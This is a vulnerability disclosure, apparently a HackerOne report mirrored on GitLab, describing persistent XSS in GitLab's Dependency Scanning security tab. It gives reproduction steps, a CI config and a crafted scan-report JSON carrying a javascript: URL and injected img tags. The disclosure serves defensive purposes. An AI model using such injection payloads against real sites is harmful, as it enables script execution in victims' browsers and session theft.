Dependency scanning Security Tab is Vulnerable to Persistent XSS
HackerOne report #418074 by ngalog on 2018-10-03:
Details: PoC:
- Private project: https://gitlab.com/golduserngalog/securitything/pipelines/31864346
- Click Security Tab
- Click Dependency Scanning Expand
- Click Proto...
- Click Links
- Popup
{F354647}
Steps to reproduce:
- Create a new project, enable auto devops
- Create following files,
.gitlab-ci.yml
andgl-dependency-scanning-report.json
gl-dependency-scanning-report.json
[
{
"tool":"retire",
"tools":[
"retire"
],
"message":"Proto<img src=x><img src=>type pollution attack for extend",
"url":"javascript:alert(document.domain)//https://hackerone.com/reports/381185",
"cve":"Protot<img src=x><img src=>ype pollution attack for extend",
"priority":"Crit<img src=x><img src=>ical"
}
]
.gitlab-ci.yml
image: alpine
.sast:
script:
- echo hi
artifacts:
paths:
- gl-sast-report.json
dependency_scanning:
script:
- echo hi
artifacts:
paths:
- gl-dependency-scanning-report.json
Impact
Persistent xss in security tab, also fire under security dashboard
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
Edited by Alexander Dietrich